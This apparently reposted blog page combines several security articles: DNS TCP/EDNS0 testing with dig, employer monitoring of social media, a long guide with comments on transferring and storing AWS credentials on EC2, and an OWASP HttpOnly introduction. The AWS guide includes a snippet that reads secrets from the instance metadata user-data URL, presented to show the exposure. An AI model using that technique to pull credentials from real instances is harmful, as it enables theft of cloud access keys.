dig +nodnssec +norec +ignore ns . @L.ROOT-SERVERS.NET
dig +dnssec +norec +ignore ns . @L.ROOT-SERVERS.NET
dig +dnssec +norec +vc any . @L.ROOT-SERVERS.NET

You can also use dig to test against the OARC DNS servers.
dig @208.67.222.222 +short rs.dns-oarc.net txt
dig @158.43.128.1 +short rs.dns-oarc.net txt

RIPE NCC also provides a method for testing your DNS query reply size. RIPE also offers a Java reply size test utility that you may find useful.

When you are testing DNS it is often helpful to have a protocol analyzer running so that you can inspect the queries and the responses. If you are using Wireshark then you can set a display filter for your captured traffic to only look at the DNS packets. This filter will look something like this.
tcp.port == 53 || udp.port == 53

You also need to check that DNS servers on the Internet can receive larger TCP DNS responses from your servers. Eventually, your DNS servers will use DNSSEC and you want those DNS resolvers in other organizations to be able to get all your DNSSEC information. Therefore, you must test your UDP and TCP port 53 traffic in both directions.

Other Issues
If you have permitted both TCP and UDP port 53 to traverse to and from your DNS servers and are still not having any luck, you may have an issue with your DNS implementation. It is conceivable that your DNS vendor has incorrectly interpreted the IETF RFCs and doesn't support TCP communications for DNS. There is an IETF draft called "DNS Transport over TCP - Implementation Requirements" which clarifies that "DNS resolvers and recursive servers MUST support UDP, and SHOULD support TCP". If this is the case then you should educate your vendor and possibly consider switching to a new version of BIND, djbdns, or Secure64.

I wish you good luck deploying DNSSEC and IPv6 while using DNS over UDP and TCP port 53 with EDNS0.

Scott


Employers on track to get more nosey with employees' social media lives

Hacking 2012. 6. 1.

By 2015, 60 percent of employers are likely to be eavesdropping on our social media selves to make sure our e-blabbing isn't poking security holes into their outfits, Gartner says.

According to Gartner's predictions, published on Tuesday in a report entitled "Conduct Digital Surveillance Ethically and Legally: 2012 Update", employers that are now only monitoring their brands and their marketing are going to broaden their foci to include tracking employees' social media doings as part of security monitoring.

As it is, Gartner says, less than 10 percent of organizations are currently monitoring their employees' social media activities as part of security monitoring. Instead, they're keeping an eye on security around internal infrastructure.

The cloud's going to change that, as will the Bring Your Own Device culture and the popular use of iGadgets in the workplace. As organizations' data migrate onto these technologies, security's got to follow, Gartner says.

Here's how Andrew Walls, research vice president of Gartner, put it in a press release:

Security monitoring and surveillance must follow enterprise information assets and work processes into whichever technical environments are used by employees to execute work. Given that employees with legitimate access to enterprise information assets are involved in most security violations, security monitoring must focus on employee actions and behavior wherever the employees pursue business-related interactions on digital systems. In other words, the development of effective security intelligence and control depends on the ability to capture and analyze user actions that take place inside and outside of the enterprise IT environment.

There certainly seems to be no shortage of internet usage monitoring tools. For example, here's a review site that has loads.

But here's the rub: how does an organization:

  1. Sift through the huge volume of irrelevant social media material to find actual threats;
  2. Keep its security staff from becoming creepy, voyeuristic stalkers; and
  3. Avoid breaking privacy laws (which, mind you, differ from state to state and country to country)?

Here's what Walls says:

While automated, covert monitoring of computer use by staff suspected of serious policy violations can produce hard evidence of inappropriate or illegal behaviors, and guide management response, it might also violate privacy laws. In addition, user awareness of focused monitoring can be a deterrent for illicit behavior, but surveillance activities may be seen as a violation of legislation, regulations, policies or cultural expectations. There are also various laws in multiple countries that restrict the legality of interception of communications or covert monitoring of human activity.

Beyond that, how are employees going to feel about all this monitoring?

My guess is they're going to start paying a lot more attention to privacy controls in social media, as well as the intricacies of what's legal for their employers to do.

If you're curious to know whether your employer can covertly and legally sift through your activity, say, by reading your encrypted email messages, a good resource is the Privacy Rights Clearinghouse's fact sheet on workplace privacy and employee monitoring.

As far as whether or not we can be fired over what we post on social media sites, the PRC says it depends on your employer's policies and your state's law.

A few helpful snippets from PRC on that matter:

Many companies have social media policies that limit what you can and cannot post on social networking sites about your employer. A website called Compliance Building has a database of social media policies for hundreds of companies. You should ask your supervisor or human resources department what the policy is for your company.

Some states, including California, Colorado, Connecticut, North Dakota and New York, have laws that prohibit employers from disciplining an employee based on off-duty activity on social networking sites, unless the activity can be shown to damage the company in some way. In general, posts that are work-related have the potential to cause the company damage.

There is no federal law that we are aware of that an employer is breaking by monitoring employees on social networking sites. In fact, employers can even hire third-party companies to monitor online employee activity for them.

True that. In fact, as the PRC points out, in March 2010 a company called Teneros launched the "Social Sentry" service to track online activity of employees across social networking sites.

Interestingly enough, that service isn't available anymore. That might have something to do with cultural expectations about privacy.

Those expectations are reflected in some of the headlines that greeted Social Sentry's release: "Sayonara, Social Sentry: Bosses Can Spy for Free With Web Tools", "Teneros Blows a Chill over Social Networks", and "Big Brother is Indeed Watching You: The Spy Side of Social".

I would feel sorry for privacy-deprived employees, but you guys are, evidently, security poison.

It's like CIO reported on Wednesday: at Infosecurity London last month, attendees rated employees scarier when it comes to security than hackers, consultants, third parties, or domestic or foreign government agencies.

In other words, 71 percent of 300 polled attendees said that the people creeping around their own hallways were their biggest data breach threats. Bigger than domestic or foreign government agencies, bigger than Anonymous.

Network security risks from employees are pretty easy to grasp - employees could open a malware-containing email, act carelessly with company trade secrets or intellectual property, or bring insecure devices into the workplace.

Likewise, employees on social media can give away trade secrets or simply act like unprofessional idiots and thereby embarrass their employers. They can also click on scams in Facebook.

Should employers monitor their employees' social media use? It's hard to say no, given the potential security risks of social media.

But as we move toward workplaces with ever more pervasive surveillance, I'd suggest that organizations take the time to study the privacy laws. Those laws continue to evolve. You might be within your rights today but seen as a leering Big Brother tomorrow.


How to Keep Your AWS Credentials on an EC2 Instance Securely

August 31, 2009

If you’ve been using EC2 for anything serious then you have some code on your instances that requires your AWS credentials. I’m talking about code that does things like this:

  • Attach an EBS volume
  • Download your application from a non-public location in S3
  • Send and receive SQS messages
  • Query or update SimpleDB

All these actions require your credentials. How do you get the credentials onto the instance in the first place? How can you store them securely once they’re there? First let’s examine the issues involved in securing your keys, and then we’ll explore the available options for doing so.

Potential Vulnerabilities in Transferring and Storing Your Credentials

There are a number of vulnerabilities that should be considered when trying to protect a secret. I’m going to ignore the ones that result from obviously foolish practice, such as transferring secrets unencrypted.

  1. Root: root can get at any file on an instance and can see into any process’s memory. If an attacker gains root access to your instance, and your instance can somehow know the secret, your secret is as good as compromised.
  2. Privilege escalation: User accounts can exploit vulnerabilities in installed applications or in the kernel (whose latest privilege escalation vulnerability was patched in new Amazon Kernel Images on 28 August 2009) to gain root access.
  3. User-data: Any user account able to open a socket on an EC2 instance can see the user-data by fetching the URL http://169.254.169.254/latest/user-data (a minimal fetch is sketched after this list). This is exploitable if a web application running in EC2 does not validate input before visiting a user-supplied URL. Accessing the user-data URL is particularly problematic if you use the user-data to pass the secret into the instance unencrypted – one quick wget (or curl) command by any user and your secret is compromised. And there is no way to clear the user-data – once it is set at launch time, it is visible for the entire life of the instance.
  4. Repeatability: HTTPS URLs transport their content securely, but anyone who has the URL can get the content. In other words, there is no authentication on HTTPS URLs. If you specify an HTTPS URL pointing to your secret it is safe in transit but not safe from anyone who discovers the URL.
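
To make vulnerability 3 concrete, this is all it takes to read the user-data from code running on the instance. A stdlib-only Python sketch, doing the same thing as the wget one-liner mentioned above:

import urllib.request

# Any local process inside an EC2 instance can read this URL; if the
# user-data carries an unencrypted secret, the secret is exposed.
url = "http://169.254.169.254/latest/user-data"
print(urllib.request.urlopen(url, timeout=2).read().decode())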

Benefits Offered by Transfer and Storage Methods

Each transfer and storage method offers a different set of benefits. Here are the benefits against which I evaluate the various methods presented below:

  1. Easy to do. It’s easy to create a file in an AMI, or in S3. It’s slightly more complicated to encrypt it. But, you should have a script to automate the provision of new credentials, so all of the methods are graded as “easy to do”.
  2. Possible to change (now). Once an instance has launched, can the credentials it uses be changed?
  3. Possible to change (future). Is it possible to change the credentials that will be used by instances launched in the future? All methods provide this benefit but some make it more difficult to achieve than others, for example instances launched via Auto Scaling may require the Launch Configuration to be updated.


How to Put AWS Credentials on an EC2 Instance

With the above vulnerabilities and benefits in mind let’s look at different ways of getting your credentials onto the instance and the consequences of each approach.

Mitch Garnaat has a great set of articles about the AWS credentials. Part 1 explores what each credential is used for, and part 2 presents some methods of getting them onto an instance, the risks involved in leaving them there, and a strategy to mitigate the risk of them being compromised. A summary of part 1: keep all your credentials secret, like you keep your bank account info secret, because they are – literally – the keys to your AWS kingdom.

As discussed in part 2 of Mitch’s article, there are a number of methods to get the credentials (or indeed, any secret) onto an instance. Here are two, evaluated in light of the benefits presented above:

1. Burn the secret into the AMI

Pros:

  • Easy to do.

Cons:

  • Not possible to change (now) easily. Requires SSHing into the instance, updating the secret, and forcing all applications to re-read it.
  • Not possible to change (future) easily. Requires bundling a new AMI.
  • The secret can be mistakenly bundled into the image when making derived AMIs.

Vulnerabilities:

  • root, privilege escalation.

2. Pass the secret in the user-data

Pros:

  • Easy to do. Putting the secret into the user-data must be integrated into the launch procedure.
  • Possible to change (future). Simply launch new instances with updated user-data. With Auto Scaling, create a new Launch Configuration with the updated user-data.

Cons:

  • Not possible to change (now). User-data cannot be changed once an instance is launched.

Vulnerabilities:

  • user-data, root, privilege escalation.
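
For reference, here is roughly what passing a secret in the user-data looks like at launch time. This is a sketch based on the boto library's EC2 API as I recall it; the AMI ID, instance type, and secret value are placeholders:

import boto

# boto reads the launching machine's AWS credentials from its environment.
conn = boto.connect_ec2()

# The user_data argument becomes the instance's user-data, readable by any
# local process for the entire life of the instance (see the cons above).
reservation = conn.run_instances("ami-12345678",
                                 instance_type="m1.small",
                                 user_data="AWS_SECRET=...")
print("launched", reservation.instances[0].id)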

Here are some additional methods to transfer a secret to an instance, not mentioned in the article:

3. Put the secret in a public URL
The URL can be on a website you control or in S3. It’s insecure and foolish to keep secrets in a publicly accessible URL. Please don’t do this, I had to mention it just to be comprehensive.

Pros:

  • Easy to do.
  • Possible to change (now). Simply update the content at that URL. Any processes on the instance that read the secret each time will see the new value once it is updated.
  • Possible to change (future).

Cons:

  • Completely insecure. Any attacker between the endpoint and the EC2 boundary can see the packets and discover the URL, revealing the secret.

Vulnerabilities:

  • repeatability, root, privilege escalation.

4. Put the secret in a private S3 object and provide the object’s path
To get content from a private S3 object you need the secret access key in order to authenticate with S3. The question then becomes “how to put the secret access key on the instance”, which you need to do via one of the other methods.

Pros:

  • Easy to do.
  • Possible to change (now). Simply update the content at that
    URL. Any processes on the instance that read the secret each time will see the new value once it is updated.
  • Possible to change (future).

Cons:

  • Inherits the cons of the method used to transfer the secret access key.

Vulnerabilities:

  • root, privilege escalation.

5. Put the secret in a private S3 object and provide a signed HTTPS S3 URL
The signed URL must be created before launching the instance and specified somewhere that the instance can access – typically in the user-data. The signed URL expires after some time, limiting the window of opportunity for an attacker to access the URL. The URL should be HTTPS so that the secret cannot be sniffed in transit.

Pros:

  • Easy to do. The S3 URL signing must be integrated into the launch procedure.
  • Possible to change (now). Simply update the content at that URL. Any processes on the instance that read the secret each time will see the new value once it is updated.
  • Possible to change (future). In order to integrate with Auto Scaling you would need to (automatically) update the Auto Scaling Group’s Launch Configuration to provide an updated signed URL for the user-data before the previously specified signed URL expires.

Cons:

  • The secret must be cached on the instance. Once the signed URL expires the secret cannot be fetched from S3 anymore, so it must be stored on the instance somewhere. This may make the secret liable to be burned into derived AMIs.

Vulnerabilities:

  • repeatability (until the signed URL expires), root, privilege escalation.
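
The signing step for this method might look like the following. This is a sketch using boto's S3 API as I recall it (its generate_url call); the bucket and key names are placeholders:

import boto

# Uses the credentials available on the machine doing the launching.
conn = boto.connect_s3()

# Produce an HTTPS URL for the private object that expires in 10 minutes.
signed_url = conn.generate_url(600, "GET",
                               bucket="my-secrets-bucket",
                               key="instance-credentials")
print(signed_url)

# Pass signed_url to the instance (typically in the user-data); the
# instance must fetch and cache the secret before the URL expires.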

6. Put the secret on the instance from an outside source, via SCP or SSH
This method involves an outside client – perhaps your local computer, or a management node – whose job it is to put the secret onto the newly-launched instance. The management node must have the private key with which the instance was launched, and must know the secret in order to transfer it. This approach can also be automated by having a process on the management node poll every minute or so for newly launched instances.

Pros:

  • Easy to do. OK, not “easy” because it requires an outside management node, but it’s doable.
  • Possible to change (now). Have the management node put the updated secret onto the instance.
  • Possible to change (future). Simply put a new secret onto the management node.

Cons:

  • The secret must be cached somewhere on the instance because it cannot be “pulled” from the management node when needed. This may make the secret liable to be burned into derived AMIs.

Vulnerabilities:

  • root, privilege escalation.
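
The push from the management node can be as simple as wrapping scp and ssh, as in this sketch (driven from Python's subprocess module; the hostname, key path, and destination path are placeholders):

import subprocess

# Run from the management node, which holds both the launch keypair and
# the secret. Copy the secret over SSH, then lock down its permissions.
host = "ec2-203-0-113-10.compute-1.amazonaws.com"
subprocess.run(["scp", "-i", "launch-key.pem", "credentials",
                "root@%s:/root/.aws-credentials" % host], check=True)
subprocess.run(["ssh", "-i", "launch-key.pem", "root@" + host,
                "chmod 600 /root/.aws-credentials"], check=True)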

The above methods can be used to transfer the credentials – or any secret – to an EC2 instance.

Instead of transferring the secret directly, you can transfer an encrypted secret. In that case, you’d need to provide a decryption key also – and you’d use one of the above methods to do that. The overall security of the secret would be influenced by the combination of methods used to transfer the encrypted secret and the decryption key. For example, if you encrypt the secret and pass it in the user-data, providing the decryption key in a file burned into the AMI, the secret is vulnerable to anyone with access to both user-data and the file containing the decryption key. Also, if you encrypt your credentials then changing the encryption key requires changing two items: the encryption key and the encrypted credentials. Therefore, changing the encryption key can only be as easy as changing the credentials themselves.
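
The mechanics of the encryption layer itself are straightforward. Here is one sketch that shells out to the openssl command-line tool (the file names and key file are placeholders; any symmetric-cipher tooling would do):

import subprocess

# Encrypt the credentials with a symmetric key before transferring them.
subprocess.run(["openssl", "enc", "-aes-256-cbc", "-salt",
                "-pass", "file:decryption.key",
                "-in", "credentials", "-out", "credentials.enc"],
               check=True)

# Decrypt on the instance, where decryption.key was delivered by a
# *different* method (burned into the AMI, for example).
subprocess.run(["openssl", "enc", "-d", "-aes-256-cbc",
                "-pass", "file:decryption.key",
                "-in", "credentials.enc", "-out", "credentials"],
               check=True)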

How to Keep AWS Credentials on an EC2 Instance

Once your credentials are on the instance, how do you keep them there securely?

First off, let’s remember that in an environment out of your control, such as EC2, you have no guarantees of security. Anything processed by the CPU or put into memory is vulnerable to bugs in the hypervisor (the virtualization provider) or to malicious AWS personnel (though the AWS Security White Paper goes to great lengths to explain the internal procedures and controls they have implemented to mitigate that possibility) or to legal search and seizure. What this means is that you should only run applications in EC2 for which the risk of secrets being exposed via these vulnerabilities is acceptable. This is true of all applications and data that you allow to leave your premises. But this article is about the security of the AWS credentials, which control the access to your AWS resources. It is perfectly acceptable to ignore the risk of abuse by AWS personnel exposing your credentials because AWS folks can manipulate your account resources without needing your credentials! In short, if you are willing to use AWS then you trust Amazon with your credentials.

There are three ways to store information on a running machine: on disk, in memory, and not at all.

1. Keeping a secret on disk
The secret is stored in a file on disk, with the appropriate permissions set on the file. The secret survives a reboot intact, which can be a pro or a con: it's a good thing if you want the instance to remain in service through a reboot; it's a bad thing if you're trying to hide the location of the secret from an attacker, because the boot process contains the script that retrieves and caches the secret, revealing its cached location. You can work around this by having the retrieval script remove traces of the secret's location after it does its work. But applications will still need to access the secret somehow, so it remains vulnerable.

Pros:

  • Easily accessible by applications on the instance.

Cons:

  • Visible to any process with the proper permissions.
  • Easy to forget when bundling an AMI of the instance.

Vulnerabilities:

  • root, privilege escalation.
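
Here is a minimal sketch of writing such a file in Python (path and contents are placeholders); creating the file with owner-only permissions from the start avoids a window where it is world-readable:

import os

def write_secret(path, secret):
    # Create the file with mode 0600 atomically; fail if it already exists.
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    try:
        os.write(fd, secret.encode())
    finally:
        os.close(fd)

write_secret("/etc/aws-credentials", "AKIAEXAMPLE:example-secret-access-key")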

2. Keeping the secret in memory
The secret is stored as a file on a ramdisk. (There are other memory-based methods, too.) The main difference between storing the secret in memory and on the filesystem is that memory does not survive a reboot. If you remove the traces of retrieving the secret and storing it from the startup scripts after they run during the first boot, the secret will only exist in memory. This can make it more difficult for an attacker to discover the secret, but it does not add any additional security. A tmpfs-based sketch appears after the list below.

Pros:

  • Easily accessible by applications on the instance.

Cons:

  • Visible to any process with the proper permissions.

Vulnerabilities:

  • root, privilege escalation.
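
A minimal tmpfs-based sketch in Python (mount point and contents are placeholders; requires root). Note that tmpfs pages can be swapped to disk under memory pressure, so disable swap, or use ramfs instead, if that matters to you:

import os, subprocess

# Mount a small memory-backed filesystem; it vanishes on reboot.
os.makedirs("/mnt/secrets", exist_ok=True)
subprocess.check_call(["mount", "-t", "tmpfs", "-o", "size=1m,mode=0700",
                       "tmpfs", "/mnt/secrets"])
with open("/mnt/secrets/aws-credentials", "w") as f:
    f.write("AKIAEXAMPLE:example-secret-access-key")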

3. Do not store the secret; retrieve it each time it is needed
This method requires your applications to support the chosen transfer method. A sketch of re-fetching the secret from the user-data on each use appears after the list below.

Pros:

  • Secret is never stored on the instance.

Cons:

  • Requires more time because the secret must be fetched each time it is needed.
  • Cannot be used with signed S3 URLs. These URLs expire after some time and the secret will no longer be accessible. If the URL does not expire in a reasonable amount of time then it is as insecure as a public URL.
  • Cannot be used with externally-transferred (via SSH or SCP) secrets because the secret cannot be pulled from the management node. Any protocol that tries to pull the secret from the management node could also be used by an attacker to request the secret.

Vulnerabilities:

  • root, privilege escalation.
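
For example, if the secret was passed in the user-data, an application can re-read it from the instance metadata service on every use instead of caching it; a minimal sketch in Python:

import urllib.request

# Well-known EC2 instance metadata endpoint for user-data.
USER_DATA_URL = "http://169.254.169.254/latest/user-data"

def fetch_credentials():
    # Fetch the secret fresh on each use; nothing is written to disk.
    with urllib.request.urlopen(USER_DATA_URL) as resp:
        return resp.read().decode()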

Choosing a Method to Transfer and Store Your Credentials

The above two sections explore some options for transferring and storing a secret on an EC2 instance. If the secret is guarded by another key – such as an encryption key or an S3 secret access key – then this key must also be kept secret and transferred and stored using one of those same methods. Let’s put all this together into some tables presenting the viable options.

Unencrypted Credentials

Here is a summary table evaluating the transfer and storage of unencrypted credentials using different combinations of methods:

Transferring and Keeping Unencrypted Credentials

Some notes on the above table:

  • Methods making it “hard” to change credentials are highlighted in yellow because, through scripting, the difficulty can be minimized. Similarly, the risk of forgetting credentials in an AMI can be minimized by scripting the AMI creation process and choosing a location for the credential file that is excluded from the AMI by the script.
  • While you can transfer credentials using a private S3 URL, you still need to provide the secret access key in order to access that private S3 URL. This secret access key must also be transferred and stored on the instance, so the private S3 URL is not by itself usable. See below for an analysis of using a private S3 URL to transfer credentials. Therefore the Private S3 URL entries are marked as N/A.
  • You can burn credentials into an AMI and store them in memory. The startup process can remove them from the filesystem and place them in memory. The startup process should then remove all traces from the startup scripts mentioning the key’s location in memory, in order to make discovery more difficult for an attacker with access to the startup scripts.
  • Credentials burned into the AMI cannot be “not stored”. They can be erased from the filesystem, but must be stored somewhere in order to be usable by applications. Therefore these entries are marked as N/A.
  • Credentials transferred via a signed S3 URL cannot be “not stored” because the URL expires and, once that happens, is no longer able to provide the credentials. Thus, these entries are marked N/A.
  • Credentials “pushed” onto the instance from an outside source, such as SSH, cannot be “not stored” because they must be accessible to applications on the instance. These entries are marked N/A.

A glance at the above table shows that it is, overall, not difficult to manage unencrypted credentials via any of the methods. Remember: don't use the Public URL method; it's completely insecure.

Bottom line: If you don’t care about keeping your credentials encrypted then pass a signed S3 HTTPS URL in the user-data. The startup scripts of the instance should retrieve the credentials from this URL and store them in a file with appropriate permissions (or in a ramdisk if you don’t want them to remain through a reboot), then the startup scripts should remove their own commands for getting and storing the credentials. Applications should read the credentials from the file (or directly from the signed URL if you don’t care that it will stop working after it expires).
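
Your SDK or library almost certainly provides a call to generate these signed URLs; purely as a self-contained illustration, here is a sketch of the S3 query-string authentication scheme of the era (HMAC-SHA1 over a fixed string-to-sign) in Python. Treat the details as illustrative and prefer the SDK's own signing call:

import base64, hmac, time
from hashlib import sha1
from urllib.parse import quote

def signed_s3_url(access_key_id, secret_key, bucket, key, expires_in=240):
    # Sign "GET\n\n\n<expires>\n/<bucket>/<key>" with the secret access key.
    expires = int(time.time()) + expires_in
    string_to_sign = "GET\n\n\n%d\n/%s/%s" % (expires, bucket, key)
    signature = base64.b64encode(
        hmac.new(secret_key.encode(), string_to_sign.encode(), sha1).digest())
    return ("https://%s.s3.amazonaws.com/%s?AWSAccessKeyId=%s&Expires=%d"
            "&Signature=%s" % (bucket, key, access_key_id, expires,
                               quote(signature.decode(), safe="")))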

Encrypted Credentials

We discussed 6 different ways of transferring credentials and 3 different ways of storing them. A transfer method and a storage method must be used for the encrypted credentials and for the decryption key. That gives us 36 combinations of transfer methods, and 9 combinations of storage methods, for a grand total of 324 choices.

Here are the first 54, summarizing the options when you choose to burn the encrypted credentials into the AMI:

As (I hope!) you can see, all combinations that involve burning encrypted credentials into the AMI make it hard (or impossible) to change the credentials or the encryption key, both on running instances and for future ones.

Here are the next set, summarizing the options when you choose to pass encrypted credentials via the user-data:

Passing encrypted credentials in the user-data requires the decryption key to be transferred also. It’s pointless from a security perspective to pass the decryption key together with the encrypted credentials in the user-data. The most flexible option in the above table is to pass the decryption key via a signed S3 HTTPS URL (specified in the user-data, or specified at a public URL burned into the AMI) with a relatively short expiry time (say, 4 minutes) allowing enough time for the instance to boot and retrieve it.

Here is a summary of the combinations when the encrypted credentials are passed via a public URL:

It might be surprising, but passing encrypted credentials via a public URL is actually a viable option. You just need to make sure you send and store the decryption key securely, so send that key via a signed S3 HTTPS URL (specified in the user-data, or specified at a public URL burned into the AMI) for maximum flexibility.

The combinations with passing the encrypted credentials via a private S3 URL are summarized in this table:

As explained earlier, the private S3 URL is not usable by itself because it requires the AWS secret access key. (The access key ID is not a secret.) The secret access key can be transferred and stored using the combinations of methods shown in the above table.

The most flexible of the options shown in the above table is to pass in the secret access key inside a signed S3 HTTPS URL (which is itself provided in the user-data or at a public URL burned into the AMI).

Almost there…. This next table summarizes the combinations with encrypted credentials passed via a signed S3 HTTPS URL:

The signed S3 HTTPS URL containing the encrypted credentials can be specified in the user-data or specified behind a public URL which is burned into the AMI. The best options for providing the decryption key are via another signed URL or from an external management node via SSH or SCP.

And, the final section of the table summarizing the combinations of using encrypted credentials passed in via SSH or SCP from an outside management node:

The above table summarizing the use of an external management node to place encrypted credentials on the instance shows exactly the same results as the previous table (for a signed S3 HTTPS URL). The same flexibility is achieved using either method.

The Bottom Line

Here’s a practical recommendation: if you have code that generates signed S3 HTTPS URLs then pass two signed URLs into the user-data, one containing the encrypted credentials and the other containing the decryption key. The startup sequence of the AMI should read these two items from their URLs, decrypt the credentials, and store the credentials in a ramdisk file with the minimum permissions necessary to run the applications. The startup scripts should then remove all traces of the procedure (beginning with “read the user-data URL” and ending with “remove all traces of the procedure”) from themselves.

If you don’t have code to generate signed S3 URLs then burn the encrypted credentials into the AMI and pass the decryption key via the user-data. As above, the startup sequence should decrypt the credentials, store them in a ramdisk, and destroy all traces of the raw ingredients and the process itself.
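
As a rough sketch of that startup sequence in Python: the two-URLs-one-per-line user-data layout, the Fernet cipher, and the mount point are all assumptions carried over from the earlier sketches, not a prescribed format:

import subprocess, urllib.request
from cryptography.fernet import Fernet  # assumption: same cipher as earlier

def fetch(url):
    with urllib.request.urlopen(url) as resp:
        return resp.read()

# Assumed convention: the user-data holds two signed URLs, one per line.
user_data = fetch("http://169.254.169.254/latest/user-data").decode()
creds_url, key_url = user_data.splitlines()[:2]

subprocess.check_call(["mount", "-t", "tmpfs", "-o", "size=1m,mode=0700",
                       "tmpfs", "/mnt/secrets"])
with open("/mnt/secrets/aws-credentials", "wb") as f:
    f.write(Fernet(fetch(key_url)).decrypt(fetch(creds_url)))
# A real boot script would now scrub these commands and URLs from itself.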

This article is an informal review of the benefits and vulnerabilities offered by different methods of transferring credentials to and storing credentials on an EC2 instance. In a future article I will present scripts to automate the procedures described. In the meantime, please leave your feedback in the comments.


Comments (14)

1 Michael Fairchild October 18, 2009 at 9:04 pm

Another option you can add to the matrix is using an additional authenticate-only AWS user.
Create a new AWS user, 'wimpy', but do not sign up for any services, and do not provide a credit card.
Although the new user cannot provision any AWS resources, it does get an account id and access keys. Private S3 buckets and objects can be shared with this wimpy user. The wimpy user credentials can be provided in the user-data (or similar options mentioned), allowing boot scripts to retrieve authenticated objects from S3 while not exposing the keys to the entire AWS kingdom.
A benefit of this approach, as compared to time-expiring S3 URLs, is that it can be used with autoscaling.

This method will not, however, give access to ec2-api commands such as ebs-attach-volume etc. If (and only if) access to these commands is required from the instance, a separate monitor instance that does have the primary AWS keys can be used to proxy ec2 commands. The monitor host can listen for requests on the 10.* network from authenticated security groups, and run whatever additional verification is required before executing the requested ec2-command. This reduces the exposure of your secret to a single instance.

2 shlomo October 18, 2009 at 10:09 pm

@Michael Fairchild,

Mitch Garnaat suggests a similar two-credential method in part 2 of his article (linked above). He calls them "Secret Credentials" ('wimpy') and "Double Secret Credentials" (the real ones).

The "monitor host" idea is similar to one I've been kicking around lately. My comment to Mitch's blog post outlines the idea, and some more detail is in the comments to the following blog:
http://elastic-security.com/2009/08/20/ec2-design-patterns-1-externalconsole/

3 6p00e54ee6e7b68834 November 10, 2009 at 11:58 pm

Given the constraints imposed by Auto Scaling, I think there's a better option than using signed URLs.

Signed URLs have the problem of a hardcoded expiration date, which means you need some external script that is vigilant in continually generating new signed URLs and updating your Auto Scaling Group parameters with the latest URL (which will need to be replaced again in X minutes). This puts robustness in direct opposition to security – the most secure solution mandates a short expiration time, which decreases the robustness of the system by requiring the external script to run frequently, without fail.

There's a better solution that keeps all the security goodness of signed URLs with none of the "signed-URL-generator-must-run-or-Auto-Scaling-will-fail" badness.

Instead of using signed URLs, use *public* URLs with a random path element:

https://s3etc/as0df98a0b980a98a0sd98f0a98sdfa/secret-user-data.txt

The URL is world-readable, but its path is unguessable (just like a signed URL).

Your Auto Scaling Launch config is initially configured with this URL.

Your external script then runs *whenever it wants*, creating a new random path & uploading your data to it, and then updating the Auto Scaling Launch Config to point at the new path. The script then deletes the file from the old path, so all running instances no longer have access to the secret data.

This can be combined with the "wimpy" auth scheme so that the URL doesn't even need to be public, and thus your attacker (if lucky enough to remote-exec on the machine before the URL dies) needs more than just 'curl' to get the secret data.

4 shlomo December 6, 2009 at 3:41 am

@6p00e54ee6e7b68834,

That's also a good suggestion. Even better would be to use a single-use URL, which would cease to work after the first retrieval. Then it would not need to be deleted.

5 Gabe March 30, 2010 at 5:02 am

AWS could help a lot by providing a way to generate credentials constrained to specific APIs. For example, if I have a machine that simply writes to an SQS queue, then I would generate credentials that only have access to the SendMessage API. If my machine needs to attach EBS volumes and access S3, I would generate credentials with only those permissions. That way in the case of a compromised system or elevation of privilege the damage done is limited to the rights granted in the credentials.

6 shlomo March 30, 2010 at 5:28 pm

@Gabe,

Absolutely, I agree that fine-grained credentials would help mitigate the risk of compromised credentials.

7 Yarin April 22, 2010 at 2:50 pm

Good article - any thoughts on using SimpleDB to store credentials?

8 shlomo April 22, 2010 at 3:18 pm

@Yarin,

SimpleDB requires AWS credentials to access. So it’s equivalent to the option “4. Put the secret in a private S3 object and provide the object’s path” discussed above.

9 Jack July 9, 2010 at 11:47 pm

If I generate a presigned URL with Amazon’s SDK to a private S3 object, I can access it in a regular browser, but wget/curl gives me an Error 403: Forbidden. Do you know why that is?

10 shlomo July 10, 2010 at 7:45 pm

@Jack,

Try putting the URL you give to wget in quotes. Some of these URLs have special characters that the shell interprets and quoting the URL argument will prevent the shell from interpreting those special characters.

11 Ewout July 12, 2010 at 9:38 pm

@Schlomo,

I have been struggling with the same challenge of getting AWS credentials on an EC2 instance. I came up with roughly the same list of options as you, until tonight, when I thought of another possibility:

when launching an instance, one can specify a snapshot to automatically create an EBS volume from and bind it to a block device. What if you created an EBS volume, put your credentials on it, create a snapshot from that, and then use the mentioned approach? One could use the user-data script (or whatever) to mount the block device and read the credentials. And when an instance terminates, by default the created EBS volume gets deleted (unless you turned it off in the –block-device-mapping option). Make sure the snapshot is private though. And I assume traffic between EC2 and EBS is secure, however I’m not sure of that, but there are many EBS boot images now, so that would be awkward then. Finally, it’s possible to encrypt the EBS volume at filesystem level, and pass the key for it in your user-data script; it doesn’t add security, but prevents someone else from reading the raw storage after having deleted the volume.

That still leaves the ‘How to Keep AWS Credentials on an EC2 Instance’ part, probably you would need to look at SELinux or AppArmor to fix that one, if EC2 even supports that (since EC2 provides the kernels). Also, one could use a read-only filesystem on the EBS volume and have some credentials broker there which takes proper measures to prevent unauthorized retrieving of the credentials; but no idea how to really secure that yet, if it is even possible (since root can do anything, but one could look at the pid of the process requesting the credentials, see which binary it belongs to and check whether the binary is untampered with for example, one could store a list of binaries and sha1sums in the read-only filesystem; but the filesystem itself might be unmounted/recreated/mounted as well).

12 shlomo July 19, 2010 at 4:16 pm

@Ewout,

Thanks for your comment! I’ve written an article showing how to implement this technique.

13 never mind November 6, 2010 at 9:47 am

You do realize that once the volume is mounted the credentials are available in clear text to any process with uid 0, right? (think “hackers” here) So what’s the improvement then? Let’s face it, there is *no* secure way to store clear text credentials. And you need them in clear text if you want to use them for AWS.

14 shlomo November 28, 2010 at 1:18 am

@never mind,

True, there’s no secure way to secure clear-text credentials.

The AWS Identity and Access Management features can be used to mitigate the risk of credentials being exposed.

Posted by CEOinIRVINE

HttpOnly

Hacking 2011. 12. 10. 05:00

From OWASP

Overview

The goal of this section is to introduce, discuss, and provide language-specific mitigation techniques for HttpOnly.

Who developed HttpOnly? When?

According to a daily blog article by Jordan Wiens, “No cookie for you!,” HttpOnly cookies were first implemented in 2002 by Microsoft Internet Explorer developers for Internet Explorer 6 SP1 [1].

What is HttpOnly?

According to the Microsoft Developer Network, HttpOnly is an additional flag included in a Set-Cookie HTTP response header. Using the HttpOnly flag when generating a cookie helps mitigate the risk of client side script accessing the protected cookie (if the browser supports it).

  • The example below shows the syntax used within the HTTP response header:
Set-Cookie: <name>=<value>[; <Max-Age>=<age>]
[; expires=<date>][; domain=<domain_name>]
[; path=<some_path>][; secure][; HttpOnly]

